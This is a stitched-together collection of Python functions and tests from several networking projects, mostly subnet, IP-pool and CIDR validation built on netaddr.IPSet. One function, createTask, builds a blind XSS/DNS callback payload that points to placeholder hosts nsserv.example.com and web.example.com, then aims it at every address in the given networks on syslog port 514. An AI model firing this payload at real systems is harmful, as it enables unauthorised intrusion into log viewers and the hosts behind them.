def validate_allocation_pools(self, ip_pools, subnet_cidr): """Validate IP allocation pools. Verify start and end address for each allocation pool are valid, ie: constituted by valid and appropriately ordered IP addresses. Also, verify pools do not overlap among themselves. Finally, verify that each range fall within the subnet's CIDR. """ subnet = netaddr.IPNetwork(subnet_cidr) subnet_first_ip = netaddr.IPAddress(subnet.first + 1) # last address is broadcast in v4 subnet_last_ip = netaddr.IPAddress(subnet.last - (subnet.version == 4)) LOG.debug("Performing IP validity checks on allocation pools") ip_sets = [] for ip_pool in ip_pools: start_ip = netaddr.IPAddress(ip_pool.first, ip_pool.version) end_ip = netaddr.IPAddress(ip_pool.last, ip_pool.version) if (start_ip.version != subnet.version or end_ip.version != subnet.version): LOG.info("Specified IP addresses do not match " "the subnet IP version") raise n_exc.InvalidAllocationPool(pool=ip_pool) if start_ip < subnet_first_ip or end_ip > subnet_last_ip: LOG.info("Found pool larger than subnet " "CIDR:%(start)s - %(end)s", {'start': start_ip, 'end': end_ip}) raise n_exc.OutOfBoundsAllocationPool( pool=ip_pool, subnet_cidr=subnet_cidr) # Valid allocation pool # Create an IPSet for it for easily verifying overlaps ip_sets.append(netaddr.IPSet(ip_pool.cidrs())) LOG.debug("Checking for overlaps among allocation pools " "and gateway ip") ip_ranges = ip_pools[:] # Use integer cursors as an efficient way for implementing # comparison and avoiding comparing the same pair twice for l_cursor in range(len(ip_sets)): for r_cursor in range(l_cursor + 1, len(ip_sets)): if ip_sets[l_cursor] & ip_sets[r_cursor]: l_range = ip_ranges[l_cursor] r_range = ip_ranges[r_cursor] LOG.info("Found overlapping ranges: %(l_range)s and " "%(r_range)s", {'l_range': l_range, 'r_range': r_range}) raise n_exc.OverlappingAllocationPools( pool_1=l_range, pool_2=r_range, subnet_cidr=subnet_cidr)
def _validate_subnet_cidr(context, network_id, new_subnet_cidr): """Validate the CIDR for a subnet. Verifies the specified CIDR does not overlap with the ones defined for the other subnets specified for this network, or with any other CIDR if overlapping IPs are disabled. """ if neutron_cfg.cfg.CONF.allow_overlapping_ips: return new_subnet_ipset = netaddr.IPSet([new_subnet_cidr]) # Using admin context here, in case we actually share networks later subnet_list = db_api.subnet_find(context.elevated(), None, None, None, False, network_id=network_id, shared=[False]) for subnet in subnet_list: if (netaddr.IPSet([subnet.cidr]) & new_subnet_ipset): # don't give out details of the overlapping subnet err_msg = (_("Requested subnet with cidr: %(cidr)s for " "network: %(network_id)s overlaps with another " "subnet") % { 'cidr': new_subnet_cidr, 'network_id': network_id }) LOG.error( _("Validation for CIDR: %(new_cidr)s failed - " "overlaps with subnet %(subnet_id)s " "(CIDR: %(cidr)s)"), { 'new_cidr': new_subnet_cidr, 'subnet_id': subnet.id, 'cidr': subnet.cidr }) raise exceptions.InvalidInput(error_message=err_msg)
def from_dict(cls, username: str, config: dict): addresses = config.get("address", []) if not isinstance(addresses, list): addresses = [addresses] if len(addresses): prefixes = netaddr.IPSet() for a in addresses: prefixes.add(netaddr.IPNetwork(a)) else: prefixes = None return cls(username=username, password_hash=config["password"], prefixes=prefixes)
def pools_to_ip_sets(_ip_pools, _ip_sets, _ip_ranges): def pools_to_ip_range(ip_pools): __ip_ranges = [] for ip_pool in ip_pools: __ip_ranges.append( netaddr.IPRange(ip_pool['start'], ip_pool['end'])) return __ip_ranges for ip_range in pools_to_ip_range(_ip_pools): _ip_sets.append(netaddr.IPSet(ip_range.cidrs())) _ip_ranges.append(ip_range) return _ip_sets
def ensure_default_policy(cidrs, subnets): policy_cidrs = netaddr.IPSet(cidrs) for subnet in subnets: subnet_cidr = netaddr.IPNetwork(subnet["cidr"]) network_ip = subnet_cidr.network broadcast_ip = subnet_cidr.broadcast prefix_len = '32' if subnet_cidr.version == 4 else '128' default_policy_cidrs = ["%s/%s" % (network_ip, prefix_len), "%s/%s" % (broadcast_ip, prefix_len)] for cidr in default_policy_cidrs: if (netaddr.IPNetwork(cidr) not in policy_cidrs and cidr not in cidrs): cidrs.append(cidr)
def _validate_subnet_cidr(self, context, network, new_subnet_cidr): """Validate the CIDR for a subnet. Verifies the specified CIDR does not overlap with the ones defined for the other subnets specified for this network, or with any other CIDR if overlapping IPs are disabled. Does not apply to subnets with temporary IPv6 Prefix Delegation CIDRs (::/64). """ new_subnet_ipset = netaddr.IPSet([new_subnet_cidr]) # Disallow subnets with prefix length 0 as they will lead to # dnsmasq failures (see bug 1362651). # This is not a discrimination against /0 subnets. # A /0 subnet is conceptually possible but hardly a practical # scenario for neutron's use cases. for cidr in new_subnet_ipset.iter_cidrs(): if cidr.prefixlen == 0: err_msg = _("0 is not allowed as CIDR prefix length") raise n_exc.InvalidInput(error_message=err_msg) if cfg.CONF.allow_overlapping_ips: subnet_list = network.subnets else: subnet_list = self._get_all_subnets(context) for subnet in subnet_list: if ((netaddr.IPSet([subnet.cidr]) & new_subnet_ipset) and subnet.cidr != constants.PROVISIONAL_IPV6_PD_PREFIX): # don't give out details of the overlapping subnet err_msg = (_("Requested subnet with cidr: %(cidr)s for " "network: %(network_id)s overlaps with another " "subnet") % {'cidr': new_subnet_cidr, 'network_id': network.id}) LOG.info(_LI("Validation for CIDR: %(new_cidr)s failed - " "overlaps with subnet %(subnet_id)s " "(CIDR: %(cidr)s)"), {'new_cidr': new_subnet_cidr, 'subnet_id': subnet.id, 'cidr': subnet.cidr}) raise n_exc.InvalidInput(error_message=err_msg)
def _updated_subnetpool_dict(self, model, new_pool): updated = {} new_prefixes = new_pool.get('prefixes', attributes.ATTR_NOT_SPECIFIED) orig_prefixes = [str(x.cidr) for x in model['prefixes']] if new_prefixes is not attributes.ATTR_NOT_SPECIFIED: orig_set = netaddr.IPSet(orig_prefixes) new_set = netaddr.IPSet(new_prefixes) if not orig_set.issubset(new_set): msg = _("Existing prefixes must be " "a subset of the new prefixes") raise n_exc.IllegalSubnetPoolPrefixUpdate(msg=msg) new_set.compact() updated['prefixes'] = [str(x.cidr) for x in new_set.iter_cidrs()] else: updated['prefixes'] = orig_prefixes for key in ['id', 'name', 'ip_version', 'min_prefixlen', 'max_prefixlen', 'default_prefixlen', 'shared', 'default_quota']: self._write_key(key, updated, model, new_pool) return updated
def login(): if octoprint.server.userManager is not None and "user" in request.values.keys( ) and "pass" in request.values.keys(): username = request.values["user"] password = request.values["pass"] if "remember" in request.values.keys( ) and request.values["remember"] == "true": remember = True else: remember = False user = octoprint.server.userManager.findUser(username) if user is not None: if octoprint.server.userManager.checkPassword(username, password): login_user(user, remember=remember) identity_changed.send(current_app._get_current_object(), identity=Identity(user.get_id())) return jsonify(user.asDict()) return make_response(("User unknown or password incorrect", 401, [])) elif "passive" in request.values.keys(): user = current_user if user is not None and not user.is_anonymous(): identity_changed.send(current_app._get_current_object(), identity=Identity(user.get_id())) return jsonify(user.asDict()) elif s().getBoolean(["accessControl", "autologinLocal"]) \ and s().get(["accessControl", "autologinAs"]) is not None \ and s().get(["accessControl", "localNetworks"]) is not None: autologinAs = s().get(["accessControl", "autologinAs"]) localNetworks = netaddr.IPSet([]) for ip in s().get(["accessControl", "localNetworks"]): localNetworks.add(ip) try: remoteAddr = util.getRemoteAddress(request) if netaddr.IPAddress(remoteAddr) in localNetworks: user = octoprint.server.userManager.findUser(autologinAs) if user is not None: login_user(user) identity_changed.send( current_app._get_current_object(), identity=Identity(user.get_id())) return jsonify(user.asDict()) except: logger = logging.getLogger(__name__) logger.exception( "Could not autologin user %s for networks %r" % (autologinAs, localNetworks)) return NO_CONTENT
def test_get_null_routes_addresses(self, get_method): url, region = "TEST_URL", "TEST_REGION" ipset = netaddr.IPSet(netaddr.IPNetwork(self.cidr)) payload = [{ "status": "1", "note": None, "updated": None, "name": None, "status_name": None, "region.id": region, "ip": None, "idql": None, "discovered": None, "netmask": None, "tag": None, "conf": None, "cidr": self.sub_cidr, "id": None, "switch.hostname": None, }] body = [{ "paginate": { "total_count": len(payload), "total_count_display": None, "total_pages": None, "author_comment": None, "per_page": None, "page": None }, "request": None, "payload": payload, "response": None }] get_method.return_value.json.return_value = body addresses = null_routes.get_null_routes_addresses(url, region, ipset) get_method.assert_called_once_with(url, verify=False) self.assertEqual(addresses, netaddr.IPSet(netaddr.IPNetwork(self.sub_cidr)))
def initialize(self, host, bridge_manager, config): LOG.info("Initializing the Endpoint File Manager. \n %s", config) self.epg_mapping_file = os.path.join(config['epg_mapping_dir'], FILE_NAME_FORMAT) self.vrf_mapping_file = os.path.join(config['epg_mapping_dir'], VRF_FILE_NAME_FORMAT) self.lbiface_mapping_file_fmt = os.path.join(config['epg_mapping_dir'], LBIFACE_FILE_NAME_FORMAT) self.file_formats = [ self.epg_mapping_file, self.vrf_mapping_file, self.lbiface_mapping_file_fmt ] self.uplink_intf_name = config['nested_domain_uplink_interface'] self.dhcp_domain = config['dhcp_domain'] self.es_port_dict = {} self.vrf_dict = {} self.vif_to_vrf = {} self._load_es_next_hop_info(config['external_segment']) self.int_fip_alloc = {4: {}, 6: {}} self.int_fip_pool = { 4: netaddr.IPSet(config['internal_floating_ip_pool']), 6: netaddr.IPSet(config['internal_floating_ip6_pool']) } if ofcst.METADATA_DEFAULT_IP in self.int_fip_pool[4]: self.int_fip_pool[4].remove(ofcst.METADATA_DEFAULT_IP) self.snat_iptables = snat_iptables_manager.SnatIptablesManager( bridge_manager) self._registered_endpoints = set() self._stale_endpoints = set() self.vif_int_dict = {} self._setup_ep_directory() self.host = host self.nat_mtu_size = config['nat_mtu_size'] self.bridge_manager = bridge_manager self.nested_domain_uplink_interface = ( config['nested_domain_uplink_interface']) return self
def allocate_address(cls, pool, dbapi=None, order=None): """ Allocates the next available IP address from a pool. """ if not dbapi: dbapi = pecan.request.dbapi # Build a set of defined ranges defined = netaddr.IPSet() for (start, end) in pool.ranges: defined.update(netaddr.IPRange(start, end)) # Determine which addresses are already in use addresses = dbapi.addresses_get_by_pool(pool.id) inuse = netaddr.IPSet() for a in addresses: inuse.add(a.address) # Calculate which addresses are still available available = defined - inuse if available.size == 0: raise exception.AddressPoolExhausted(name=pool.name) if order is None: order = pool.order # Select an address according to the allocation scheme return cls._select_address(available, order)
def get_targets(file): root = get_root_element(file) targets = netaddr.IPSet() for preference in root.findall( ".//Preferences/ServerPreferences/preference"): if preference[0].tag == "name" and preference[0].text == "TARGET": for target in map(str.strip, preference[1].text.split(sep=",")): if "-" not in target: targets.add(target) else: ip_range = target.split(sep="-") targets.add(netaddr.IPRange(ip_range[0], ip_range[1])) return targets
def enable(self, enable_list=None): '''Set active set of connections via list of fnmatch/IP patterns to limit run_command; pass in None to reset to enable all connections''' self.disabled = set() if enable_list is None: self.console.q.put( (('ENABLED', True), 'All %d hosts currently enabled' % len(self.connections))) return if isinstance(enable_list, basestring): # Handle single value being passed instead of list enable_list = [enable_list] # Assemble an enabled list, then complement it at the end enabled = set() for pattern in enable_list: direct_match = self.locate(pattern) if direct_match: enabled.add(direct_match) continue # Try using pattern as IP network or glob first # if it doesn't look like either, then treat it as a name wildcard pattern_match = set() try: ip_match = netaddr.IPNetwork(pattern) except Exception as e: try: ip_match = netaddr.IPSet(netaddr.IPGlob(pattern)) except Exception as e: ip_match = None for host, t in self.connections.items(): if ip_match: try: if netaddr.IPAddress(t.getpeername()[0]) in ip_match: pattern_match.add(host) except Exception as e: pass else: if fnmatch.fnmatch(str(host), pattern): pattern_match.add(host) if len(pattern_match) > 1: self.console.q.put((('ENABLED', True), 'Pattern wildcard "%s" matched %d hosts' % (pattern, len(pattern_match)))) enabled.update(pattern_match) # Take complement of enabled set for host in self.connections: if host not in enabled: self.disabled.add(host) self.console.q.put( (('ENABLED', True), '%d hosts currently enabled' % len(enabled)))
def run(self): results = [] targets = netaddr.IPSet() for target in self.include: if self.isIpAddress(target): self.logger.debug("Including: %s" % target) targets.add(target) elif self.isCidr(target): self.logger.debug("Including: %s" % target) targets.add(target) elif self.isRange(target): target = target.replace(' ', '') self.logger.debug("Including: %s" % target) parts = target.split('-') range = netaddr.IPRange(parts[0], parts[1]) for cidr in range.cidrs(): targets.add(cidr) for target in self.exclude: if target not in targets: #self.logger.debug("%s not found in target set", target) continue if self.isIpAddress(target): self.logger.debug("Excluding %s" % target) targets.remove(target) elif self.isCidr(target): self.logger.debug("Excluding %s" % target) targets.remove(target) elif self.isRange(target): target = target.replace(' ', '') self.logger.debug("Excluding %s" % target) parts = target.split('-') range = netaddr.IPRange(parts[0], parts[1]) for cidr in range.cidrs(): targets.remove(cidr) targets.compact() if self.enumerate is True: for target in targets: results.append(str(target)) else: for target in targets.iter_cidrs(): results.append(str(target)) if self.format == 'json': print json.dumps(results) elif self.format == 'csv': print ','.join(results)
def createTask(self): # Here goes example xss/dns payload # Listen for the logs of the ns server # Prepare www server for callbacks dnsServer = 'nsserv.example.com' webServer = 'web.example.com' examplePayload = "%s'\"><img/src=//%s."+ dnsServer + "><img/src=//" + webServer + "/1.png?%s><" payload = self.payload or examplePayload print("Using payload: %s" % payload) attackNetworkList = [netaddr.IPNetwork(networkCidr) for networkCidr in self.cidrNetworkList] network = netaddr.IPSet(attackNetworkList) print("Total attack len: %s" % len(network)) attackTargetList = [{'ipaddress':"%s" % ipAddress, 'port':514, 'payload':self.payload or (payload % (self.idGenerator(), ipAddress, ipAddress))} for ipAddress in network] return attackTargetList
def get_subnet_scope(self, tenant, network, cidr): scope = None cidr = netaddr.IPNetwork(cidr) if self.source: def_scope, tenant_cons, net_cons = ( self.source.get_subnet_constraints(tenant, network)) scope = def_scope or scope for constraints in [net_cons, tenant_cons]: if constraints: # scope is deny if there is any overlap with deny set # scope is public/private if subset of public/private set if netaddr.IPSet(cidr) & (constraints.get('deny') or netaddr.IPSet()): return SCOPE_DENY elif cidr in (constraints.get('private') or netaddr.IPSet()): return SCOPE_PRIVATE elif cidr in (constraints.get('public') or netaddr.IPSet()): return SCOPE_PUBLIC elif constraints.get('default'): return constraints.get('default') return scope
def enrich( alert: dict, search_window_hours: int, vpn_ip_cidrs: types.List[str], search_fn: types.Callable[[SearchQuery], types.List[dict]], ) -> dict: '''Search for events that describe an assignment of a VPN IP address to the sourceipaddress in an alert. ''' details = alert.get('details', {}) source_ip = details.get('sourceipaddress') if source_ip is None: return alert if netaddr.IPAddress(source_ip) not in netaddr.IPSet(vpn_ip_cidrs): return alert search_vpn_assignment = SearchQuery({ 'hours': search_window_hours, }) search_vpn_assignment.add_must([ TermMatch('tags', 'vpn'), TermMatch('tags', 'netfilter'), TermMatch('details.success', 'true'), TermMatch('details.vpnip', source_ip), PhraseMatch('summary', 'netfilter add upon connection'), ]) assign_events = sorted( [hit.get('_source', {}) for hit in search_fn(search_vpn_assignment)], key=lambda evt: toUTC(evt['utctimestamp']), reverse=True, # Sort into descending order from most recent to least. ) if len(assign_events) == 0: return alert event = assign_events[0] details['vpnassignment'] = { 'username': event['details']['username'], 'originalip': event['details']['sourceipaddress'], } alert['details'] = details return alert
def setTarget(self, target): ipSet = netaddr.IPSet() try: if target.find('-') >= 0: parts = target.split('-') range = netaddr.IPRange(parts[0], parts[1]) for cidr in range.cidrs(): ipSet.add(cidr) self.target.append(cidr) else: ipSet.add(target) self.target.append(target) except netaddr.core.AddrFormatError: return false
def ip_from_string(string): """ Takes a string and extracts all valid IP Addresses as a SET of Strings Uses the validate_ip helper function to achieve. :param string: Any string of data :return: IP Addresses as a netaddr.IPSet or empty netaddr.IPSet if none found """ ip_regex = re.compile('(?:[0-9]{1,3}\.){3}[0-9]{1,3}(?:\/[0-9]{1,2})?') potential_ips = ip_regex.findall(string) valid_ips = [] for ip in potential_ips: if validate_ip(ip) is True: valid_ips.append(ip) return netaddr.IPSet(valid_ips)
def test_auto_refresh(self): self._write_constraints_file(self.file_data) ncs = anc.ConfigFileSource(self.cons_file_name) self.assertEqual((anc.SCOPE_PUBLIC, { 'public': netaddr.IPSet(['10.20.0.0/16']), 'default': 'private' }, { 'default': 'deny' }), ncs.get_subnet_constraints('t1', 'net3')) time.sleep(0.1) data = self.file_data.replace('subnet_scope = public', 'subnet_scope = deny') data = data.replace('t1/net3', 't2/net3') self._write_constraints_file(data) self.assertEqual((anc.SCOPE_DENY, { 'public': netaddr.IPSet(['10.20.0.0/16']), 'default': 'private' }, {}), ncs.get_subnet_constraints('t1', 'net3')) self.assertEqual((anc.SCOPE_DENY, {}, { 'default': 'deny' }), ncs.get_subnet_constraints('t2', 'net3'))
def validate_cidr(self, cidr): test_cidr_set = netaddr.IPSet([cidr]) all_subnets = self.list_subnets() all_subnet_ips = [sn['allocation_pools'] for sn in all_subnets] for idx, subnet_ip_list in enumerate(all_subnet_ips): for subnet_ip_range in subnet_ip_list: test_range = netaddr.IPRange(subnet_ip_range['start'], subnet_ip_range['end']) for ip in test_range: if ip in test_cidr_set: raise Exception( "Overlap detected for CIDR %s and Subnet %s" % (cidr, all_subnets[idx])) return True
def _check_policy_rules_overlap(self, context, ipsec_site_conn): """validate no overlapping policy rules The nsx does not support overlapping policy rules cross all tenants, and tier0 routers """ connections = self.vpn_plugin.get_ipsec_site_connections( context.elevated()) if not connections: return vpnservice_id = ipsec_site_conn.get('vpnservice_id') vpnservice = self.vpn_plugin._get_vpnservice(context, vpnservice_id) local_cidrs = [vpnservice['subnet']['cidr']] peer_cidrs = ipsec_site_conn['peer_cidrs'] for conn in connections: # skip this connection and connections in non active state if (conn['id'] == ipsec_site_conn.get('id') or conn['status'] != constants.ACTIVE): continue # TODO(asarfaty): support peer groups too # check if it overlaps with the peer cidrs conn_peer_cidrs = conn['peer_cidrs'] if netaddr.IPSet(conn_peer_cidrs) & netaddr.IPSet(peer_cidrs): # check if the local cidr also overlaps con_service_id = conn.get('vpnservice_id') con_service = self.vpn_plugin._get_vpnservice( context.elevated(), con_service_id) conn_local_cidr = [con_service['subnet']['cidr']] if netaddr.IPSet(conn_local_cidr) & netaddr.IPSet(local_cidrs): msg = (_("Cannot create a connection with overlapping " "local and peer cidrs (%(local)s and %(peer)s) " "as connection %(id)s") % { 'local': local_cidrs, 'peer': peer_cidrs, 'id': conn['id'] }) raise nsx_exc.NsxVpnValidationError(details=msg)
def test__get_targets_call(self): multiple_targets = self.uut.get_targets(self.internal_targets_xml) self.assertEqual(len(multiple_targets.iter_cidrs()), 9) self.assertEqual(netaddr.IPNetwork("10.10.10.0/8"), multiple_targets.iter_cidrs()[0]) self.assertEqual(netaddr.IPNetwork("192.168.1.1/32"), multiple_targets.iter_cidrs()[1]) self.assertEqual(netaddr.IPNetwork("192.168.2.10/31"), multiple_targets.iter_cidrs()[2]) self.assertEqual(netaddr.IPNetwork("192.168.2.12/30"), multiple_targets.iter_cidrs()[3]) self.assertEqual(netaddr.IPNetwork("192.168.2.16/28"), multiple_targets.iter_cidrs()[4]) self.assertEqual(netaddr.IPNetwork("192.168.2.32/27"), multiple_targets.iter_cidrs()[5]) self.assertEqual(netaddr.IPNetwork("192.168.2.64/28"), multiple_targets.iter_cidrs()[6]) self.assertEqual(netaddr.IPNetwork("192.168.2.80/29"), multiple_targets.iter_cidrs()[7]) self.assertEqual(netaddr.IPNetwork("192.168.2.88/32"), multiple_targets.iter_cidrs()[8]) ip_set = netaddr.IPSet() for n in range(9, 90, 1): ip_set.add(F"192.168.2.{n}") check_set = netaddr.IPSet() for cidr in multiple_targets.iter_cidrs()[-7:]: check_set.add(cidr) for ip in ip_set: if str(ip) == "192.168.2.9" or str(ip) == "192.168.2.89": self.assertFalse(ip in check_set) else: self.assertTrue(ip in check_set)
def create_route(context, route): LOG.info("create_route for tenant %s" % context.tenant_id) if not route: raise n_exc.BadRequest(resource="routes", msg="Malformed body") route = route.get("route") if not route: raise n_exc.BadRequest(resource="routes", msg="Malformed body") for key in ["gateway", "cidr", "subnet_id"]: if key not in route: raise n_exc.BadRequest(resource="routes", msg="%s is required" % key) subnet_id = route["subnet_id"] with context.session.begin(): subnet = db_api.subnet_find(context, id=subnet_id, scope=db_api.ONE) if not subnet: raise n_exc.SubnetNotFound(subnet_id=subnet_id) if subnet["ip_policy"]: policies = subnet["ip_policy"].get_cidrs_ip_set() else: policies = netaddr.IPSet([]) alloc_pools = allocation_pool.AllocationPools(subnet["cidr"], policies=policies) try: alloc_pools.validate_gateway_excluded(route["gateway"]) except neutron_exc.GatewayConflictWithAllocationPools as e: LOG.exception(str(e)) raise n_exc.BadRequest(resource="routes", msg=str(e)) # TODO(anyone): May want to denormalize the cidr values into columns # to achieve single db lookup on conflict check route_cidr = netaddr.IPNetwork(route["cidr"]) subnet_routes = db_api.route_find(context, subnet_id=subnet_id, scope=db_api.ALL) quota.QUOTAS.limit_check(context, context.tenant_id, routes_per_subnet=len(subnet_routes) + 1) for sub_route in subnet_routes: sub_route_cidr = netaddr.IPNetwork(sub_route["cidr"]) if sub_route_cidr.value == DEFAULT_ROUTE.value: continue if route_cidr in sub_route_cidr or sub_route_cidr in route_cidr: raise q_exc.RouteConflict(route_id=sub_route["id"], cidr=str(route_cidr)) new_route = db_api.route_create(context, **route) return v._make_route_dict(new_route)
def get_utilization(self): """Get the child prefix size and parent size. For Prefixes with a status of "container", get the number child prefixes. For all others, count child IP addresses. Returns: UtilizationData (namedtuple): (numerator, denominator) """ if self.status == Prefix.STATUS_CONTAINER: queryset = Prefix.objects.net_contained( self.prefix).filter(vrf=self.vrf) child_prefixes = netaddr.IPSet([p.prefix for p in queryset]) return UtilizationData(numerator=child_prefixes.size, denominator=self.prefix.size) else: # Compile an IPSet to avoid counting duplicate IPs child_count = netaddr.IPSet( [ip.address.ip for ip in self.get_child_ips()]).size prefix_size = self.prefix.size if self.prefix.version == 4 and self.prefix.prefixlen < 31 and not self.is_pool: prefix_size -= 2 return UtilizationData(numerator=child_count, denominator=prefix_size)
def test_create_port_json(self): keys = [('admin_state_up', True), ('status', self.port_create_status)] with self.port(name='myname') as port: for k, v in keys: self.assertEqual(port['port'][k], v) self.assertIn('mac_address', port['port']) ips = port['port']['fixed_ips'] self.assertEqual(1, len(ips)) subnet_db = directory.get_plugin().get_subnet( context.get_admin_context(), ips[0]['subnet_id']) self.assertIn(netaddr.IPAddress(ips[0]['ip_address']), netaddr.IPSet(netaddr.IPNetwork(subnet_db['cidr']))) self.assertEqual('myname', port['port']['name']) self._verify_dns_assigment(port['port'], ips_list=[ips[0]['ip_address']])
def _test_allow_allocation_pool_identity(self, conf_flag): CONF.set_override('allow_allocation_pool_growth', conf_flag, 'QUARK') cidr = "192.168.1.0/24" ip_network = netaddr.IPNetwork(cidr) network = dict(name="public", tenant_id="fake", network_plugin="BASE") network = {"network": network} pool = [dict(start='192.168.1.15', end='192.168.1.30')] subnet = dict(id=1, ip_version=4, next_auto_assign_ip=2, cidr=cidr, first_ip=ip_network.first, last_ip=ip_network.last, ip_policy=None, allocation_pools=pool, tenant_id="fake") subnet = {"subnet": subnet} with self._stubs(network, subnet) as (net, sub1): subnet = subnet_api.get_subnet(self.context, 1) start_pools = subnet['allocation_pools'] new_pool = [dict(start='192.168.1.15', end='192.168.1.30')] start_ip_set = netaddr.IPSet() for rng in start_pools: start_ip_set.add(netaddr.IPRange(rng['start'], rng['end'])) new_ip_set = netaddr.IPSet() for rng in new_pool: new_ip_set.add(netaddr.IPRange(rng['start'], rng['end'])) self.assertTrue(start_ip_set == new_ip_set) subnet_update = {"subnet": dict(allocation_pools=new_pool)} subnet = subnet_api.update_subnet(self.context, 1, subnet_update) self.assertEqual(start_pools, subnet['allocation_pools']) self.assertEqual(new_pool, subnet['allocation_pools'])
def test_create_locks_address_doesnt_exist(self): network = db_api.network_create(self.context) subnet = db_api.subnet_create( self.context, network=network, cidr=self.cidr, ip_version=4) self.context.session.flush() addresses = netaddr.IPSet(netaddr.IPNetwork(self.sub_cidr)) null_routes.create_locks(self.context, [network.id], addresses) address = db_api.ip_address_find( self.context, subnet_id=subnet.id, scope=db_api.ONE) self.assertIsNotNone(address) self.assertIsNotNone(address.lock_id)
def test_aggregating_flows_for_addresses(self): # add one address old_cidr_set = netaddr.IPSet(['192.168.10.6']) new_cidr_set, added_cidr, deleted_cidr = \ self.app._get_cidr_changes_after_adding_addresses( old_cidr_set, ['192.168.10.7']) expected_new_cidr_set = netaddr.IPSet(['192.168.10.6/31']) expected_added_cidr = {netaddr.IPNetwork('192.168.10.6/31')} expected_deleted_cidr = {netaddr.IPNetwork('192.168.10.6/32')} self.assertEqual(new_cidr_set, expected_new_cidr_set) self.assertEqual(added_cidr, expected_added_cidr) self.assertEqual(deleted_cidr, expected_deleted_cidr) # remove one address old_cidr_set = new_cidr_set new_cidr_set, added_cidr, deleted_cidr = \ self.app._get_cidr_changes_after_removing_addresses( old_cidr_set, ['192.168.10.7']) expected_new_cidr_set = netaddr.IPSet(['192.168.10.6/32']) expected_added_cidr = {netaddr.IPNetwork('192.168.10.6/32')} expected_deleted_cidr = {netaddr.IPNetwork('192.168.10.6/31')} self.assertEqual(new_cidr_set, expected_new_cidr_set) self.assertEqual(added_cidr, expected_added_cidr) self.assertEqual(deleted_cidr, expected_deleted_cidr) # update addresses old_cidr_set = new_cidr_set new_cidr_set, added_cidr, deleted_cidr = \ self.app._get_cidr_changes_after_updating_addresses( old_cidr_set, ['192.168.10.7'], ['192.168.10.6']) expected_new_cidr_set = netaddr.IPSet(['192.168.10.7/32']) expected_added_cidr = {netaddr.IPNetwork('192.168.10.7/32')} expected_deleted_cidr = {netaddr.IPNetwork('192.168.10.6/32')} self.assertEqual(new_cidr_set, expected_new_cidr_set) self.assertEqual(added_cidr, expected_added_cidr) self.assertEqual(deleted_cidr, expected_deleted_cidr)
def test_update_allocation_pools(self): og = CONF.QUARK.allow_allocation_pool_update CONF.set_override('allow_allocation_pool_update', True, 'QUARK') cidr = "192.168.1.0/24" ip_network = netaddr.IPNetwork(cidr) network = dict(name="public", tenant_id="fake", network_plugin="BASE") network = {"network": network} subnet = dict(id=1, ip_version=4, next_auto_assign_ip=2, cidr=cidr, first_ip=ip_network.first, last_ip=ip_network.last, ip_policy=None, tenant_id="fake") subnet = {"subnet": subnet} with self._stubs(network, subnet) as (net, sub1): subnet = subnet_api.get_subnet(self.context, 1) start_pools = subnet['allocation_pools'] new_pools = [ [dict(start='192.168.1.10', end='192.168.1.50')], [dict(start='192.168.1.5', end='192.168.1.25')], [dict(start='192.168.1.50', end='192.168.1.51')], [ dict(start='192.168.1.50', end='192.168.1.51'), dict(start='192.168.1.100', end='192.168.1.250') ], [dict(start='192.168.1.50', end='192.168.1.51')], start_pools, ] prev_pool = start_pools for pool in new_pools: subnet_update = {"subnet": dict(allocation_pools=pool)} subnet = subnet_api.update_subnet(self.context, 1, subnet_update) self.assertNotEqual(prev_pool, subnet['allocation_pools']) self.assertEqual(pool, subnet['allocation_pools']) policies = policy_api.get_ip_policies(self.context) self.assertEqual(1, len(policies)) policy = policies[0] ip_set = netaddr.IPSet() for ip in policy['exclude']: ip_set.add(netaddr.IPNetwork(ip)) for extent in pool: for ip in netaddr.IPRange(extent['start'], extent['end']): self.assertFalse(ip in ip_set) prev_pool = pool CONF.set_override('allow_allocation_pool_update', og, 'QUARK')